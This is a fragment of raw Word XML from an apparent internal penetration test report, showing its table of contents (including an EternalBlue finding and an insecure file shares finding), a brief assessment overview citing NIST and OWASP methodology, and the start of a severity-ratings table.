            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="10560"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc169647984" w:history="1">
            <w:r w:rsidRPr="0080324F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Century Gothic" w:hAnsi="Century Gothic"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>Internal Penetration Test Findings</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc169647984 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="006E2051">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7FD9A5DD" w14:textId="06242FD1" w:rsidR="006528B5" w:rsidRDefault="006528B5" w:rsidP="006528B5">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc169647985" w:history="1">
            <w:r w:rsidRPr="0080324F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Century Gothic" w:hAnsi="Century Gothic"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>Machine Compromise Walkthrough</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc169647985 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="006E2051">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5BBD072B" w14:textId="1F1EC022" w:rsidR="006528B5" w:rsidRDefault="006528B5">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="10560"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc169647986" w:history="1">
            <w:r w:rsidRPr="0080324F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Century Gothic" w:hAnsi="Century Gothic"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>Detailed Walkthrough</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc169647986 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="006E2051">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7DC8EE6F" w14:textId="7922A4BE" w:rsidR="006528B5" w:rsidRDefault="006528B5" w:rsidP="006528B5">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc169647987" w:history="1">
            <w:r w:rsidRPr="0080324F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Century Gothic" w:hAnsi="Century Gothic"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>Remediation Summary</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc169647987 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="006E2051">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>10</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="20701528" w14:textId="2BEA8140" w:rsidR="006528B5" w:rsidRDefault="006528B5">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="10560"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc169647988" w:history="1">
            <w:r w:rsidRPr="0080324F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Century Gothic" w:hAnsi="Century Gothic"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>Medium Term</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc169647988 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="006E2051">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>10</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="06E86AB0" w14:textId="20850F1C" w:rsidR="006528B5" w:rsidRDefault="006528B5">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="10560"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc169647989" w:history="1">
            <w:r w:rsidRPr="0080324F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Century Gothic" w:hAnsi="Century Gothic"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>Long Term</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc169647989 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="006E2051">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>10</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1D519C89" w14:textId="6AAFA8FF" w:rsidR="006528B5" w:rsidRDefault="006528B5" w:rsidP="006528B5">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc169647990" w:history="1">
            <w:r w:rsidRPr="0080324F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Century Gothic" w:hAnsi="Century Gothic"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>Technical Findings</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc169647990 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="006E2051">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>11</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5EEEE8E4" w14:textId="5F6B8A8C" w:rsidR="006528B5" w:rsidRDefault="006528B5">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="10560"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc169647991" w:history="1">
            <w:r w:rsidRPr="0080324F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Century Gothic" w:hAnsi="Century Gothic"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>Internal Penetration Test Findings</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc169647991 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="006E2051">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>11</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0E696AB7" w14:textId="438873B3" w:rsidR="006528B5" w:rsidRDefault="006528B5">
          <w:pPr>
            <w:pStyle w:val="TOC4"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="10560"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc169647992" w:history="1">
            <w:r w:rsidRPr="0080324F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Franklin Gothic Book" w:hAnsi="Franklin Gothic Book"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>Finding</w:t>
            </w:r>
            <w:r w:rsidRPr="0080324F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Franklin Gothic Book" w:hAnsi="Franklin Gothic Book"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:spacing w:val="-9"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="0080324F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Franklin Gothic Book" w:hAnsi="Franklin Gothic Book"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>IPT-001:</w:t>
            </w:r>
            <w:r w:rsidRPr="0080324F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Franklin Gothic Book" w:hAnsi="Franklin Gothic Book"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:spacing w:val="-5"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="0080324F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Franklin Gothic Book" w:hAnsi="Franklin Gothic Book"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>Unpatched Eternal Blue Vulnerability - Critical</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc169647992 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="006E2051">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>11</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7D2FB9EE" w14:textId="69713C9D" w:rsidR="006528B5" w:rsidRDefault="006528B5">
          <w:pPr>
            <w:pStyle w:val="TOC4"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="10560"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc169647993" w:history="1">
            <w:r w:rsidRPr="0080324F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Franklin Gothic Book" w:hAnsi="Franklin Gothic Book"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>Finding</w:t>
            </w:r>
            <w:r w:rsidRPr="0080324F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Franklin Gothic Book" w:hAnsi="Franklin Gothic Book"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:spacing w:val="-9"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="0080324F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Franklin Gothic Book" w:hAnsi="Franklin Gothic Book"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>IPT-002:</w:t>
            </w:r>
            <w:r w:rsidRPr="0080324F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Franklin Gothic Book" w:hAnsi="Franklin Gothic Book"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:spacing w:val="-5"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="0080324F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Franklin Gothic Book" w:hAnsi="Franklin Gothic Book"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>Insecure File Shares - Medium</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc169647993 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="006E2051">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>13</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1D05B742" w14:textId="2AFCDC4B" w:rsidR="007742E2" w:rsidRPr="007742E2" w:rsidRDefault="00B94616">
          <w:pPr>
            <w:rPr>
              <w:rFonts w:ascii="Century Gothic" w:hAnsi="Century Gothic"/>
              <w:b/>
              <w:bCs/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Century Gothic" w:hAnsi="Century Gothic"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
        <w:p w14:paraId="4C287184" w14:textId="4697BEE7" w:rsidR="00BC4E50" w:rsidRDefault="00000000" w:rsidP="00BC4E50">
          <w:pPr>
            <w:rPr>
              <w:rFonts w:ascii="Century Gothic" w:hAnsi="Century Gothic"/>
              <w:b/>
              <w:bCs/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w14:paraId="3C9097C1" w14:textId="77777777" w:rsidR="00BC4E50" w:rsidRDefault="00BC4E50" w:rsidP="00BC4E50"/>
    <w:p w14:paraId="21728FC4" w14:textId="77777777" w:rsidR="00BC4E50" w:rsidRDefault="00BC4E50" w:rsidP="00BC4E50"/>
    <w:p w14:paraId="45E5DD62" w14:textId="77777777" w:rsidR="006528B5" w:rsidRDefault="006528B5" w:rsidP="00BC4E50"/>
    <w:p w14:paraId="1AE2078C" w14:textId="77777777" w:rsidR="006528B5" w:rsidRDefault="006528B5" w:rsidP="00BC4E50"/>
    <w:p w14:paraId="2B843621" w14:textId="77777777" w:rsidR="006528B5" w:rsidRPr="00BC4E50" w:rsidRDefault="006528B5" w:rsidP="00BC4E50"/>
    <w:p w14:paraId="7C50B0ED" w14:textId="387A7006" w:rsidR="00BC4E50" w:rsidRDefault="00BC4E50" w:rsidP="00BC4E50">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:ascii="Century Gothic" w:hAnsi="Century Gothic"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="9FCB21"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_Toc169647974"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Century Gothic" w:hAnsi="Century Gothic"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="9FCB21"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Assessment Overview</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p w14:paraId="72B0943F" w14:textId="7D015735" w:rsidR="00BC4E50" w:rsidRPr="00BC4E50" w:rsidRDefault="00BC4E50" w:rsidP="008A3E5E">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Franklin Gothic Book" w:hAnsi="Franklin Gothic Book"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC4E50">
        <w:rPr>
          <w:rFonts w:ascii="Franklin Gothic Book" w:hAnsi="Franklin Gothic Book"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>I evaluated the security posture of the machine by comparing to the current industry best practices that included an internal network penetration test. All testing performed is based on the NIST SP 800-115 Technical Guide to Information Security Testing and Assessment, OWASP Testing Guide (v4), and customized testing frameworks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="626E709D" w14:textId="77777777" w:rsidR="00BF3488" w:rsidRDefault="00BF3488" w:rsidP="00BF3488"/>
    <w:p w14:paraId="777E9A03" w14:textId="212B582B" w:rsidR="007742E2" w:rsidRPr="00295A59" w:rsidRDefault="007742E2" w:rsidP="00295A59">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:ascii="Century Gothic" w:hAnsi="Century Gothic"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="9FCB21"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_Toc169647975"/>
      <w:r w:rsidRPr="00295A59">
        <w:rPr>
          <w:rFonts w:ascii="Century Gothic" w:hAnsi="Century Gothic"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="9FCB21"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>Finding Severity Ratings</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p w14:paraId="333BE206" w14:textId="1B5AD141" w:rsidR="009C36F8" w:rsidRDefault="007742E2" w:rsidP="007742E2">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="273"/>
      </w:pPr>
      <w:r>
        <w:t>The</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>following</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>table</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>defines</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>levels</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>of</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>severity</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>and</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>corresponding</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>CVSS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>score</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="25"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>range</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>that</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="25"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>are</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>used throughout the document to assess vulnerability and risk impact.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FAC0698" w14:textId="77777777" w:rsidR="009C36F8" w:rsidRDefault="009C36F8" w:rsidP="007742E2">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="273"/>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4"/>
        <w:gridCol w:w="1620"/>
        <w:gridCol w:w="6570"/>
      </w:tblGrid>
      <w:tr w:rsidR="007742E2" w14:paraId="50E8F71F" w14:textId="77777777" w:rsidTr="009C36F8">
        <w:trPr>
          <w:trHeight w:val="539"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1884" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="2C74B5"/>
          </w:tcPr>
          <w:p w14:paraId="732C8B0F" w14:textId="77777777" w:rsidR="007742E2" w:rsidRDefault="007742E2" w:rsidP="006C76DA">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="137"/>
              <w:ind w:left="149" w:right="130"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Century Gothic"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Century Gothic"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:spacing w:val="-2"/>
              </w:rPr>
              <w:t>Severity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
